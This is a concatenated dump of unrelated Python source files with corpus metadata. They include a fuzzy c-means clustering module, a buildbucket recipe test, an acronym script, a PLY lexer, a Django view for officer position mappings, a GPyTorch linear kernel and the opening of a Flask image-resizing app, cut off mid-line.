enumerate(labels):\n if xi in tmp:\n labels[i] = tmp.index(xi)\n else:\n tmp.append(xi)\n labels[i] = len(tmp) - 1\n return labels\n\n\ndef fcm(X, n_clusters, eps=3, m=2, random_state=None, max_iter=300,\n sample_weight=None):\n \"\"\"Fuzzy CMeans clustering\n\n Parameters\n ----------\n X : array or sparse (CSR) matrix of shape (n_samples, n_features), or \\\n array of shape (n_samples, n_samples)\n\n n_clusters : integer\n The number of seeds to choose\n\n eps : float, optional (default = 3)\n If the sum of the abs of the (new_cluster_probability_matrix \\\n - old_cluster_probability_matrix) is smaller than eps, \\\n then the algorithm will stop.\n\n m : float, optional (default = 2)\n The fuzzy number.\n\n random_state : int, RandomState instance or None (default)\n The generator used to initialize the centers. Use an int to make the\n randomness deterministic.\n\n max_iter : int, optional (default = 300)\n The maximum iteration time for FCM clustering algorthm.\n\n sample_weight : array, shape (n_samples,), optional\n Weight of each sample, such that a sample with a weight of at least\n ``min_samples`` is by itself a core sample; a sample with negative\n weight may inhibit its eps-neighbor from being core.\n Note that weights are absolute, and default to 1.\n\n Returns\n -------\n centroid : float ndarray with shape (n_clusters, n_features)\n Centroids found at the last iteration of fuzzy c-means.\n\n labels : array [n_samples]\n Cluster labels for each point.\n\n \"\"\"\n if m <= 1:\n raise ValueError(\"Invalid number of m.\"\n \" m=%d must be bigger than 1.\" % m)\n if eps <= 0:\n raise ValueError(\"Invalid number of eps.\"\n \" eps=%d must be bigger than 0.\" % eps)\n random_state = check_random_state(random_state)\n\n if max_iter <= 0:\n raise ValueError('Number of iterations should be a positive number,'\n ' got %d instead' % max_iter)\n\n if len(X) < n_clusters:\n n_clusters = len(X)\n\n X = check_array(X, accept_sparse='csr')\n # X = normalize(X)\n membership_mat = np.random.random((len(X), n_clusters))\n membership_mat = membership_mat / np.sum(membership_mat,\n axis=1)[:, np.newaxis]\n\n for iter_time in range(max_iter):\n working_membership_mat = membership_mat ** m\n Centroids = np.dot(working_membership_mat.T,\n X) / np.sum(working_membership_mat.T,\n axis=1)[:, np.newaxis]\n\n n_c_distance_mat = np.zeros((len(X), n_clusters))\n for i, x in enumerate(X):\n for j, c in enumerate(Centroids):\n n_c_distance_mat[i][j] = np.linalg.norm(x - c, 2)\n\n new_membership_mat = np.zeros((len(X), n_clusters))\n\n for i, x in enumerate(X):\n for j, c in enumerate(Centroids):\n new_membership_mat[i][j] = 1. / np.sum(\n (\n n_c_distance_mat[i][j] /\n n_c_distance_mat[i]) ** (2 / (m - 1)\n )\n )\n if np.sum(abs(new_membership_mat - membership_mat)) < eps:\n break\n membership_mat = new_membership_mat\n labels = np.argmax(new_membership_mat, axis=1)\n reconstruct_label(labels)\n return Centroids, labels, iter_time\n\n\nclass FCM(BaseEstimator, ClusterMixin):\n \"\"\"Perform fuzzy c-means clustering\n\n Parameters\n ----------\n X : array or sparse (CSR) matrix of shape (n_samples, n_features), or \\\n array of shape (n_samples, n_samples)\n\n n_clusters : integer, optional (default = 3)\n The number of seeds to choose\n\n eps : float, optional (default = 3)\n If the sum of the abs of the (new_cluster_probability_matrix \\\n - old_cluster_probability_matrix) is smaller than eps, \\\n then the algorithm will stop.\n\n m : float, optional (default = 2)\n The fuzzy number.\n\n random_state : int, RandomState instance or None (default)\n The generator used to initialize the centers. Use an int to make the\n randomness deterministic.\n\n max_iter : int, optional (default = 300)\n The maximum iteration time for FCM clustering algorthm.\n\n sample_weight : array, shape (n_samples,), optional\n Weight of each sample, such that a sample with a weight of at least\n ``min_samples`` is by itself a core sample; a sample with negative\n weight may inhibit its eps-neighbor from being core.\n Note that weights are absolute, and default to 1.\n\n Attributes\n ----------\n cluster_centers_ : array, [n_clusters, n_features]\n Coordinates of cluster centers.\n\n labels_ :\n Labels of each point\n\n Notes\n -----\n Now, something remains implementing: sample weighted \\\n section and parallel run the model.\n \"\"\"\n def __init__(self, n_clusters=3, eps=3, m=2, init='random',\n random_state=None, max_iter=300):\n self.n_clusters = n_clusters\n self.init = init\n self.m = m\n self.eps = eps\n self.max_iter = max_iter\n self.random_state = random_state\n\n def _check_test_data(self, X):\n X = check_array(X, accept_sparse='csr')\n n_samples, n_features = X.shape\n expected_n_features = self.cluster_centers_.shape[1]\n if not n_features == expected_n_features:\n raise ValueError(\"Incorrect number of features. \"\n \"Got %d features, expected %d\" % (\n n_features, expected_n_features))\n\n return X\n\n def fit(self, X, y=None, sample_weight=None):\n \"\"\"Compute Fuzzy c-means clustering.\n\n Parameters\n ----------\n X : array-like or sparse matrix, shape=(n_samples, n_features)\n Training instances to cluster.\n\n y : Ignored\n not used, present here for API consistency by convention.\n\n sample_weight : array-like, shape (n_samples,), optional\n The weights for each observation in X. If None, all observations\n are assigned equal weight (default: None)\n\n \"\"\"\n\n random_state = check_random_state(self.random_state)\n self.cluster_centers_, self.labels_, self.n_iter_ = \\\n fcm(\n X,\n n_clusters=self.n_clusters,\n m=self.m,\n eps=self.eps,\n random_state=random_state,\n max_iter=self.max_iter,\n sample_weight=sample_weight\n )\n return self\n\n def fit_predict(self, X, y=None, sample_weight=None):\n \"\"\"Compute cluster centers and predict cluster index for each sample.\n\n Convenience method; equivalent to calling fit(X) followed by\n predict(X).\n\n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, n_features]\n New data to transform.\n\n y : Ignored\n not used, present here for API consistency by convention.\n\n sample_weight : array-like, shape (n_samples,), optional\n The weights for each observation in X. If None, all observations\n are assigned equal weight (default: None)\n\n Returns\n -------\n labels : array, shape [n_samples,]\n Index of the cluster each sample belongs to.\n \"\"\"\n return self.fit(X, sample_weight=sample_weight).labels_\n","sub_path":"sklearn/cluster/fcm.py","file_name":"fcm.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"40986160","text":"# Copyright 2018 The LUCI Authors. All rights reserved.\n# Use of this source code is governed under the Apache License, Version 2.0\n# that can be found in the LICENSE file.\n\nimport json\n\nfrom google.protobuf import text_format\n\nDEPS = [\n 'buildbucket',\n 'properties',\n 'step',\n]\n\n\ndef RunSteps(api):\n text = text_format.MessageToString(api.buildbucket.build)\n api.step('build', ['echo'] + text.splitlines())\n\n\n child_build_tags = [\n '%s:%s' % t\n for t in api.buildbucket.tags_for_child_build.iteritems()\n ]\n api.step('tags_for_child_build', ['echo'] + child_build_tags)\n\n assert api.buildbucket.bucket_v1 == api.properties.get('expected_bucket_v1')\n assert api.buildbucket.builder_name == api.buildbucket.build.builder.builder\n assert api.buildbucket.gitiles_commit == (\n api.buildbucket.build.input.gitiles_commit)\n\n\ndef GenTests(api):\n\n def case(name, **properties):\n return api.test(name) + api.properties(**properties)\n\n def legacy_build(name, **buildbucket_build):\n return case(name, buildbucket={'build': buildbucket_build})\n\n yield case('empty')\n\n yield case('serialized buildbucket property', buildbucket=json.dumps({\n 'build': {'id': '123456789'}\n }))\n\n yield legacy_build('v1 build with id', id='123456789')\n\n yield legacy_build('v1 empty buildset', tags=['buildset:'])\n yield legacy_build('v1 unknown buildset format', tags=['buildset:x'])\n\n yield legacy_build('v1 gerrit change', tags=[\n 'buildset:patch/gerrit/chromium-review.googlesource.com/1/2',\n ])\n\n yield legacy_build('v1 gitiles commit', tags=[\n ('buildset:commit/gitiles/chromium.googlesource.com/chromium/src/+/'\n 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'),\n ])\n yield legacy_build('v1 gitiles commit, invalid', tags=[\n 'buildset:commit/gitiles/a/b/c/d'\n ])\n yield legacy_build(\n 'v1 created_by',\n created_by='user:jane@example.com')\n yield legacy_build(\n 'v1 created_ts',\n created_ts='1546473600000000')\n\n yield case(\n 'buildbot gitiles commit',\n revision='a' * 40,\n branch='master',\n )\n yield case(\n 'buildbot gitiles commit, parent_got_revision',\n parent_got_revision='a' * 40,\n )\n yield case(\n 'buildbot gitiles commit, both revision and parent_got_revision',\n revision='a' * 40,\n parent_got_revision='b' * 40,\n )\n yield case(\n 'buildbot gitiles commit, invalid revision',\n revision='deafbeef', # too short\n )\n yield case(\n 'buildbot gitiles commit, HEAD revision',\n revision='HEAD',\n )\n\n yield case(\n 'buildbot gerrit change',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n patch_issue=1,\n patch_set=2,\n buildbucket={\n 'build': {\n 'tags': [\n 'buildset:patch/gerrit/chromium-review.googlesource.com/1/2',\n ],\n },\n },\n )\n yield case(\n 'buildbot gerrit change, patch_gerrit_url without scheme',\n patch_storage='gerrit',\n patch_gerrit_url='example.googlesource.com',\n patch_project='a/b',\n patch_issue=1,\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change, patch_gerrit_url with unexpected scheme',\n patch_storage='gerrit',\n patch_gerrit_url='ftp://example.googlesource.com',\n patch_project='a/b',\n patch_issue=1,\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change with revision',\n revision='a' * 40,\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n patch_issue=1,\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change, issue and patchset properties',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n issue=1,\n patchset=2,\n )\n yield case(\n 'buildbot gerrit change, no project',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_issue=1,\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change, string issue',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n patch_issue='1',\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change, string issue, not a number',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n patch_issue='x',\n patch_set=2,\n )\n\n yield (\n legacy_build(\n 'v1 luci builder id',\n project='chromium',\n bucket='luci.chromium.try',\n tags=['builder:linux']) +\n api.properties(expected_bucket_v1='luci.chromium.try'))\n\n yield case(\n 'v1 buildbot builder id', mastername='chromium', buildername='linux')\n\n yield legacy_build('v1 tags', tags=['a:b', 'c:d'])\n yield legacy_build('v1 hidden tags', tags=[\n 'buildset:patch/gerrit/chromium-review.googlesource.com/1/2',\n ('buildset:commit/gitiles/chromium.googlesource.com/chromium/src/+/'\n 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'),\n 'build_address:bucket/builder/123',\n 'builder:linux',\n ])\n","sub_path":"recipe_modules/buildbucket/tests/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"449089617","text":"#acronym-JBO.py\r\n#John Bello-Ogunu\r\n#creates an acronym using a function \r\n\r\ndef acronym(word):\r\n thePhrase= \"\"\r\n newWord = word.upper().split()\r\n for ch in newWord:\r\n thePhrase = thePhrase + ch[0]\r\n return thePhrase\r\n\r\n\r\ndef main():\r\n phrase = input(\"Enter a short phrase: \" )\r\n phraseAcronym = acronym(phrase)\r\n print(\"The acronym for '\" + phrase + \"' is \" + phraseAcronym)\r\n#end main()\r\nmain()\r\n","sub_path":"acronym-JBO.py","file_name":"acronym-JBO.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"402536060","text":"from os import error\nfrom ply import *\n\nfrom reportes.error import *\nfrom Instrucciones.Excepcion import Excepcion\n\n\n# Construyendo el analizador léxico y sintactico\n\n# definicion del analizador lexico\n\n# NOMBRE QUE IDENTIFICA A CADA TOKEN\n\nlista_errores_lexico=[]\nglobal columna\ncolumna=0\n\nreservadas2 = (\n 'from',\n 'import',\n 'as',\n 'global',\n 'None',\n 'def',\n 'print',\n 'ejecutar_analisis',\n 'for',\n 'in',\n 'ejecutar',\n 'with_goto',\n 'main',\n 'if',\n 'label',\n 'goto',\n 'return',\n 'true',\n 'false'\n)\n\ntokens = reservadas2 + (\n # OPERADORES COMPARADORES\n 'IGUAL', 'BLANCO',\n 'MAYORQ',\n 'MENORQ',\n 'MAYOR_IGUALQ',\n 'MENOR_IGUALQ',\n 'DISTINTO',\n 'PARIZQ',\n 'PARDER',\n 'CORIZQ',\n 'CORDER',\n 'LLAVEIZQ',\n 'LLAVEDER',\n 'MAS',\n 'MENOS',\n 'POR',\n 'DIVIDIDO',\n 'EXPONENCIACION',\n 'MODULO',\n 'ENTERO',\n 'PUNTO',\n 'FDECIMAL',\n 'COMA',\n 'ID',\n 'CADENA',\n 'CADENA2',\n 'CARACTER',\n 'COMENTARIO_MULTILINEA',\n 'COMENTARIO_SIMPLE',\n 'ARROBA',\n 'DOS_PUNTOS',\n 'NAME',\n 'COMILLAS'\n)\n\n# EXPRESIONES REGULARES BASICAS\nt_ARROBA = r'@'\nt_PARIZQ = r'\\('\nt_PARDER = r'\\)'\nt_CORIZQ = r'\\['\nt_CORDER = r'\\]'\nt_LLAVEIZQ = r'\\{'\nt_LLAVEDER = r'\\}'\nt_COMA = r','\nt_PUNTO = r'\\.'\n# OPERADORES ARITMETICOS\nt_MAS = r'\\+'\nt_MENOS = r'-'\nt_POR = r'\\*'\nt_DIVIDIDO = r'/'\nt_EXPONENCIACION = r'\\^'\nt_MODULO = r'%'\n# OPERADORES RELACIONALES\nt_DISTINTO = r'\\<\\>'\nt_IGUAL = r'\\='\nt_MAYORQ = r'\\>'\nt_MENORQ = r'\\<'\nt_MAYOR_IGUALQ = r'\\>\\='\nt_MENOR_IGUALQ = r'\\<\\='\nt_DOS_PUNTOS = r':'\nt_NAME = r\"__name__\"\nt_COMILLAS = r'\\\"' \n# SEGUNDA FASE\n#t_DOS_PUNTOS_IGUAL = r':\\='\n\n\n\n# EXPRESIONES REGULARES CON ESTADOS\n\n# OPERADORES RELACIONALES\n# 'INNER', 'JOIN','LEFT','RIGHT','FULL', 'OUTER','ON'\n\n\ndef t_CADENA(t):\n r'\\\".*?\\\"'\n t.value = t.value[1:-1] # remuevo las comillas dobles\n return t\n\n\ndef t_CADENA2(t):\n r'\\\"__.*?__\\\"'\n t.value = t.value[1:-1] # remuevo las comillas dobles\n return t\n\n\ndef t_CARACTER(t):\n r'\\'.*?\\''\n t.value = t.value[1:-1] # remuevo las comillas simples\n #print('esto es un caracter: ', t.value)\n return t\n\n\ndef t_FDECIMAL(t):\n r'\\d+\\.\\d+'\n try:\n t.value = float(t.value)\n except ValueError:\n print(\"Float value too large %d\", t.value)\n t.value = 0\n return t\n\n\ndef t_ID(t):\n r'[a-zA-Z][a-zA-Z_0-9_]*'\n\n #print(t.value.upper())\n\n if (t.value) in reservadas2:\n #print(\"esto es una palabra reservada: \" + t.value)\n \n #print(\"llego aqui\")\n #t.value= t.value.upper()\n #t.type = t.value.upper()\n t.type = t.value\n #print(t.type)\n else:\n #print(t.value)\n t.type = 'ID'\n \n return t\n\n\ndef t_ENTERO(t):\n r'\\d+'\n try:\n t.value = int(t.value)\n #print(t.value)\n #print(t.type)\n except ValueError:\n print(\"Integer value too large %d\", t.value)\n t.value = 0\n return t\n\n\ndef t_COMENTARIO_MULTILINEA(t):\n r'/\\'\\'\\'(.|\\n)*?\\'\\'\\''\n t.lexer.lineno += t.value.count('\\n')\n\n\n# Comentario simple // ...\ndef t_COMENTARIO_SIMPLE(t):\n r'#.*\\n'\n t.lexer.lineno += 1\n\n\ndef t_BLANCO(t):\n r' |\\t'\n\n\n\ndef t_NEWLINE(t):\n r'\\n+'\n #t.lexer.lineno += t.value.count(\"\\n\")\n t.lexer.lineno += len(t.value)\n global columna\n columna = lexer.lexpos\n\ndef columas(args):\n valor = lexer.lexpos-args\n return valor\n\n# Caracteres ignorados\nt_ignore = \"\\r\"\n\n\ndef t_error(t):\n global columna\n #print(\"Illegal character '%s'\" % t.value[0])\n #print(t.value)\n #print(\"fila \", t.lexer.lineno)\n #print(\"Columna \", columas(columna))\n col = columas(columna)\n dato = Excepcion(0,\"Error Lexico\", f\"El Simbolo << {t.value[0]} >> No Pertenece al Lenguaje\", t.lexer.lineno, col)\n lista_errores_lexico.append(dato)\n t.lexer.skip(1)\n\n\nimport re\n\nprint(\"---------------------------------------\")\nlexer = lex.lex(reflags=re.IGNORECASE)\n\n","sub_path":"parser/fase2/team08/Tytus_SQLPARSER_G8/optimizacion/lexicoC3D.py","file_name":"lexicoC3D.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"540317350","text":"import logging\n\nfrom django.shortcuts import render\nfrom querystring_parser import parser\n\nfrom about.models import OfficerEmailListAndPositionMapping, Term, Officer\nfrom about.views.officer_position_and_github_mapping.officer_management_helper import TAB_STRING\nfrom about.views.position_mapping_helper import update_context, OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID, \\\n OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_INDEX, \\\n OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_NAME, \\\n OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__EMAIL_LIST_ADDRESS, \\\n OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ELECTION_POSITION\nfrom csss.views.request_validation import verify_access_logged_user_and_create_context\nfrom csss.views_helper import ERROR_MESSAGE_KEY, ERROR_MESSAGES_KEY, \\\n get_current_term, get_datetime_for_beginning_of_current_term\nfrom elections.models import NomineePosition\n\nDELETE_POSITION_MAPPING_KEY = 'delete_position_mapping'\nUN_DELETED_POSITION_MAPPING_KEY = 'un_delete_position_mapping'\nUPDATE_POSITION_MAPPING_KEY = 'update_position_mapping'\n\nlogger = logging.getLogger('csss_site')\n\n\ndef update_saved_position_mappings(request):\n (render_value, error_message, context) = verify_access_logged_user_and_create_context(request,\n TAB_STRING)\n if context is None:\n request.session[ERROR_MESSAGE_KEY] = f'{error_message}
'\n return render_value\n\n if request.method == \"POST\":\n context[ERROR_MESSAGES_KEY] = _update_positions_mapping(\n list(\n parser.parse(\n request.POST.urlencode()\n )['saved_officer_positions'].values()\n )\n )\n return render(request, 'about/position_mapping/position_mapping.html', update_context(context))\n\n\ndef _update_positions_mapping(positions):\n \"\"\"\n Updates the position mapping for the specified position\n\n Keyword Argument\n position -- the dict for a specific position\n\n Return\n error_messages -- a list of all the possible error messages\n \"\"\"\n current_specified_position_names = []\n current_specified_position_indices = []\n positions_to_save = []\n nominees_to_save = []\n for position in positions:\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID in position\n and f\"{position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID]}\".isdigit()\n and len(\n OfficerEmailListAndPositionMapping.objects.all().filter(\n id=int(position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID])\n )\n ) > 0):\n error_message = \"No valid position mapping id detected\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_INDEX in position\n and f\"{position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_INDEX]}\".isdigit()):\n error_message = \"No valid position index detected for position mapping\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_NAME in position):\n error_message = \"No valid position name detected for position mapping\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__EMAIL_LIST_ADDRESS in position):\n error_message = \"No valid position email list detected for position mapping\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ELECTION_POSITION in position):\n error_message = \"No valid position elected status detected for position mapping\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n\n position_mapping_for_selected_officer = OfficerEmailListAndPositionMapping.objects.get(\n id=int(position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID])\n )\n logger.info(\n f\"[about/update_saved_position_mappings.py _update_position_mapping()] \"\n f\"user has selected to update the position {position_mapping_for_selected_officer.position_name}\"\n )\n\n new_position_index_for_officer_position = int(\n position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_INDEX]\n )\n new_name_for_officer_position = position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_NAME]\n new_sfu_email_list_address_for_officer_position = \\\n position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__EMAIL_LIST_ADDRESS]\n elected_via_election_officer = \\\n position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ELECTION_POSITION]\n\n if officer_info_is_not_changed(position_mapping_for_selected_officer, new_name_for_officer_position,\n new_position_index_for_officer_position,\n new_sfu_email_list_address_for_officer_position,\n elected_via_election_officer):\n continue\n logger.info(\n f\"[about/update_saved_position_mappings.py _update_position_mapping()] the user's \"\n f\"change to the position {position_mapping_for_selected_officer.position_name} was detected\"\n )\n # if anything has been changed for the selected position\n success = True\n error_message = None\n previous_position_index = position_mapping_for_selected_officer.position_index\n previous_position_name = position_mapping_for_selected_officer.position_name\n if new_position_index_for_officer_position != previous_position_index:\n if new_position_index_for_officer_position in current_specified_position_indices:\n error_message = f\"more than one position have been assigned an index of \" \\\n f\"{new_position_index_for_officer_position}\"\n success = False\n else:\n current_specified_position_indices.append(new_position_index_for_officer_position)\n if success and new_name_for_officer_position != previous_position_name:\n if new_name_for_officer_position in current_specified_position_names:\n f\"more than one position have been set to the name of {new_name_for_officer_position}\"\n success = False\n else:\n current_specified_position_names.append(new_name_for_officer_position)\n\n if success:\n update_current_officer(positions_to_save, position_mapping_for_selected_officer,\n new_position_index_for_officer_position,\n new_sfu_email_list_address_for_officer_position, new_name_for_officer_position)\n update_elections_in_current_term(nominees_to_save, position_mapping_for_selected_officer,\n new_position_index_for_officer_position,\n new_name_for_officer_position\n )\n position_mapping_for_selected_officer.position_name = new_name_for_officer_position\n position_mapping_for_selected_officer.position_index = new_position_index_for_officer_position\n position_mapping_for_selected_officer.email = new_sfu_email_list_address_for_officer_position\n position_mapping_for_selected_officer.elected_via_election_officer = elected_via_election_officer\n position_mapping_for_selected_officer.save()\n else:\n logger.info(\n \"[about/update_saved_position_mappings.py _update_position_mapping()]\"\n f\" encountered error {error_message} when trying to update position\"\n f\" {position_mapping_for_selected_officer.position_name}\"\n )\n if error_message is not None:\n return [error_message]\n [position_to_save.save() for position_to_save in positions_to_save]\n [nominee_to_save.save() for nominee_to_save in nominees_to_save]\n return []\n\n\ndef officer_info_is_not_changed(position_mapping_for_selected_officer, new_name_for_officer_position,\n new_position_index_for_officer_position,\n new_sfu_email_list_address_for_officer_position,\n elected_via_election_officer):\n \"\"\"\n Returns a bool that indicates if the officer's info has been changed\n\n Keyword Arguments\n position_mapping_for_selected_officer -- the position mapping object for the officer position that may need\n to be updated\n new_name_for_officer_position -- the new name for the position mapping that may need to be updated\n new_position_index_for_officer_position -- the new index for the position mapping that may need to be updated\n new_sfu_email_list_address_for_officer_position -- the new sfu email list address for the position mapping\n that may need to be updated\n elected_via_election_officer -- the new status of whether a position is elected via election officer for\n the position mapping that may need to be updated\n\n Return\n bool -- true if a position_mapping_for_selected_officer has to be updated\n \"\"\"\n return new_name_for_officer_position == position_mapping_for_selected_officer.position_name \\\n and new_position_index_for_officer_position == position_mapping_for_selected_officer.position_index \\\n and new_sfu_email_list_address_for_officer_position == position_mapping_for_selected_officer.email \\\n and elected_via_election_officer == position_mapping_for_selected_officer.elected_via_election_officer\n\n\ndef update_current_officer(positions_to_save, position_mapping_for_selected_officer,\n new_position_index_for_officer_position,\n new_sfu_email_list_address_for_officer_position, new_name_for_officer_position):\n \"\"\"\n updating the officer object under the current term with the new position mapping info\n\n Keyword Argument\n positions_to_save -- the list that has to contain all the officer objects that have to be added to for changes\n to be saved to DB\n position_mapping_for_selected_officer -- the position mapping object for the position that has to be updated\n new_name_for_officer_position -- the new name for the officer position that need to be updated\n new_position_index_for_officer_position -- the new index for the officer position that need to be updated\n new_sfu_email_list_address_for_officer_position -- the new sfu email list address for the officer position\n that need to be updated\n \"\"\"\n terms = Term.objects.all().filter(term_number=get_current_term())\n if len(terms) == 1:\n term = terms[0]\n officers_in_current_term_that_need_update = Officer.objects.all().filter(\n elected_term=term,\n position_index=position_mapping_for_selected_officer.position_index\n )\n logger.info(\n f\"[about/update_saved_position_mappings.py _update_position_mapping()] updating\"\n f\" {len(officers_in_current_term_that_need_update)} officers due to change in position\"\n f\" {position_mapping_for_selected_officer.position_name}\"\n )\n for officer_in_current_term_that_need_update in officers_in_current_term_that_need_update:\n officer_in_current_term_that_need_update.position_index = new_position_index_for_officer_position\n officer_in_current_term_that_need_update.sfu_officer_mailing_list_email = \\\n new_sfu_email_list_address_for_officer_position\n officer_in_current_term_that_need_update.position_name = new_name_for_officer_position\n positions_to_save.append(officer_in_current_term_that_need_update)\n\n\ndef update_elections_in_current_term(nominees_to_save, position_mapping_for_selected_officer,\n new_position_index_for_officer_position,\n new_name_for_officer_position):\n \"\"\"\n Updating the nominee objects for nominees that have run for a position that needs to be updated\n in the current term\n\n Keyword Argument\n nominees_to_save -- the list that has to contain all the officer objects that have to be added to for changes\n to be saved to DB\n position_mapping_for_selected_officer -- the position mapping object for the position that has to be updated\n new_name_for_officer_position -- the new name for the nominee positions that need to be updated\n new_position_index_for_officer_position -- the new index for the nominee positions that need to be updated\n \"\"\"\n nominees_to_update = NomineePosition.objects.all().filter(\n position_index=position_mapping_for_selected_officer.position_index,\n nominee_speech__nominee__election__date__gte=get_datetime_for_beginning_of_current_term()\n )\n for nominee_to_update in nominees_to_update:\n nominee_to_update.position_name = new_name_for_officer_position\n nominee_to_update.position_index = new_position_index_for_officer_position\n nominees_to_save.append(nominee_to_update)\n","sub_path":"csss-site/src/about/views/officer_position_and_github_mapping/update_saved_position_mappings.py","file_name":"update_saved_position_mappings.py","file_ext":"py","file_size_in_byte":13732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312965569","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport torch\nfrom gpytorch.kernels import Kernel\nfrom gpytorch.lazy import MatmulLazyVariable, RootLazyVariable\nfrom gpytorch.priors._compatibility import _bounds_to_prior\n\n\nclass LinearKernel(Kernel):\n \"\"\"\n An implementation of the linear kernel :math:`k(x, z) =(x-offset)(z-offset)' + variance`.\n\n To implement this efficiently, we use a :obj:`gpytorch.lazy.RootLazyVariable` during training and a\n :math:`gpytorch.lazy.MatmulLazyVariable` during test. These lazy variables represent matrices of the form\n :math:`K = XX^{\\top}` and :math:`K = XZ^{\\top}`. This makes inference efficient because a matrix-vector product\n :math:`Kv` can be computed as :math:`Kv=X(X^{\\top}v)`, where the base multiply :math:`Xv` takes only :math:`O(nd)`\n time and space.\n \"\"\"\n\n def __init__(\n self,\n num_dimensions,\n variance_prior=None,\n offset_prior=None,\n active_dims=None,\n variance_bounds=None,\n offset_bounds=None,\n ):\n \"\"\"\n Args:\n num_dimensions (int): Number of data dimensions to expect. This is necessary to create the offset parameter.\n variance_prior (:obj:`gpytorch.priors.Prior`): Prior over the variance parameter (default `None`).\n offset_prior (:obj:`gpytorch.priors.Prior`): Prior over the offset parameter (default `None`).\n active_dims (list): List of data dimensions to operate on. `len(active_dims)` should equal `num_dimensions`.\n variance_bounds (tuple, deprecated): Min and max value for the variance parameter. Deprecated, and now\n creates a :obj:`gpytorch.priors.SmoothedBoxPrior`.\n offset_bounds (tuple, deprecated): Min and max value for the offset parameter. Deprecated, and now creates a\n :obj:'gpytorch.priors.SmoothedBoxPrior'.\n \"\"\"\n super(LinearKernel, self).__init__(active_dims=active_dims)\n variance_prior = _bounds_to_prior(prior=variance_prior, bounds=variance_bounds, log_transform=False)\n self.register_parameter(name=\"variance\", parameter=torch.nn.Parameter(torch.zeros(1)), prior=variance_prior)\n offset_prior = _bounds_to_prior(prior=offset_prior, bounds=offset_bounds, log_transform=False)\n self.register_parameter(\n name=\"offset\", parameter=torch.nn.Parameter(torch.zeros(1, 1, num_dimensions)), prior=offset_prior\n )\n\n def forward(self, x1, x2):\n if x1.size() == x2.size() and torch.equal(x1, x2):\n # Use RootLazyVariable when x1 == x2 for efficiency when composing\n # with other kernels\n prod = RootLazyVariable(x1 - self.offset)\n else:\n prod = MatmulLazyVariable(x1 - self.offset, (x2 - self.offset).transpose(2, 1))\n\n return prod + self.variance.expand(prod.size())\n","sub_path":"gpytorch/kernels/linear_kernel.py","file_name":"linear_kernel.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204847007","text":"from flask import Flask, Response, send_file, render_template, request, redirect\nfrom PIL import Image\nfrom datetime import datetime\nimport os \nCURRENT_DIRECTORY = os.getcwd()\napp = Flask(__name__)\ndef resize_image(img, width=None, height=None):\n if width and height:\n img_resize = img.resize((width, height))\n else:\n original_width, original_height = img.size \n img_resize = img.resize(__resize_factory(original_width, original_height, width,height))\n return img_resize\n\ndef __resize_factory(original_width, original_height,width,height): \n if width:\n percent_change = (width*100)/original_width\n new_height = int(original_height*(percent_change/100))\n return (width, new_height)\n elif height:\n percent_change = (height*100)/original_height\n new_width = int(original_width*(percent_change/100))\n return (new_width, height)\n\ndef trans_paste(fg_img, bg_img, alpha=1.0, box=(0,0)):\n fg_img_trans = 